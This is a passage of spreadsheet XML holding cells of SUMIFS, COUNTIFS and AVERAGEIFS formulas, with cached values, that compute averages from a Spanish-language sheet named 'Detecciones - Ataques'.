        <v>2567</v>
      </c>
      <c r="S147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>2.316769702</v>
      </c>
      <c r="T147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.03958321165</v>
      </c>
      <c r="U147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>7.03245614</v>
      </c>
      <c r="V147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>12.390625</v>
      </c>
      <c r="W147" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>12.390625</v>
      </c>
      <c r="X147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>15775.85714</v>
      </c>
      <c r="Y147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>111.475</v>
      </c>
      <c r="Z147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>20321.72294</v>
      </c>
      <c r="AA147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>5.336561454</v>
      </c>
      <c r="AB147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>46.8203125</v>
      </c>
      <c r="AC147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>11.35</v>
      </c>
      <c r="AD147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>4.009149288</v>
      </c>
      <c r="AE147" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>15</v>
      </c>
      <c r="AF147" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$GK$3:$GK$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>9.802377598</v>
      </c>
      <c r="AG147" s="271"/>
      <c r="AH147" s="352" t="s">
        <v>2567</v>
      </c>
      <c r="AI147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>1.383539403</v>
      </c>
      <c r="AJ147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>3</v>
      </c>
      <c r="AK147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>5.75</v>
      </c>
      <c r="AL147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>1</v>
      </c>
      <c r="AM147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.03958321165</v>
      </c>
      <c r="AN147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>1.031578947</v>
      </c>
      <c r="AR147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>3.833333333</v>
      </c>
      <c r="AS147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>40</v>
      </c>
      <c r="AU147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>14.5</v>
      </c>
      <c r="AV147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>3</v>
      </c>
      <c r="AW147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>2.5625</v>
      </c>
      <c r="AY147" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>6</v>
      </c>
      <c r="BA147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>35</v>
      </c>
      <c r="BB147" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>36758.66667</v>
      </c>
      <c r="BD147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>147</v>
      </c>
      <c r="BF147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>2.5</v>
      </c>
      <c r="BG147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>3</v>
      </c>
      <c r="BH147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>397</v>
      </c>
      <c r="BI147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>4</v>
      </c>
      <c r="BM147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>27091.05977</v>
      </c>
      <c r="BN147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>14399.76728</v>
      </c>
      <c r="BO147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1.019607843</v>
      </c>
      <c r="BR147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>7</v>
      </c>
      <c r="BT147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>1</v>
      </c>
      <c r="BW147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>12</v>
      </c>
      <c r="BX147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>4.875</v>
      </c>
      <c r="BZ147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>1.105691057</v>
      </c>
      <c r="CA147" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC147" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>9</v>
      </c>
      <c r="CG147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>10</v>
      </c>
      <c r="CI147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>35</v>
      </c>
      <c r="CJ147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>19</v>
      </c>
      <c r="CL147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>152</v>
      </c>
      <c r="CN147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>1</v>
      </c>
      <c r="CO147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>5.125</v>
      </c>
      <c r="CP147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>32.5</v>
      </c>
      <c r="CQ147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>13</v>
      </c>
      <c r="CR147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.2673841982</v>
      </c>
      <c r="CT147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.01097804391</v>
      </c>
      <c r="CU147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>7</v>
      </c>
      <c r="CW147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>12.5</v>
      </c>
      <c r="CY147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>21.5</v>
      </c>
      <c r="CZ147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH147" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>2.071111111</v>
      </c>
      <c r="DI147" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ147" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GK$3:$GK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.636363636</v>
      </c>
      <c r="DK147" s="271"/>
    </row>
    <row r="148">
      <c r="J148" s="277"/>
      <c r="K148" s="512"/>
      <c r="L148" s="512"/>
      <c r="M148" s="512"/>
      <c r="N148" s="512"/>
      <c r="O148" s="278"/>
      <c r="Q148" s="271"/>
      <c r="R148" s="352" t="s">
        <v>2570</v>
      </c>
      <c r="S148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.1666666667</v>
      </c>
      <c r="T148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U148" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,
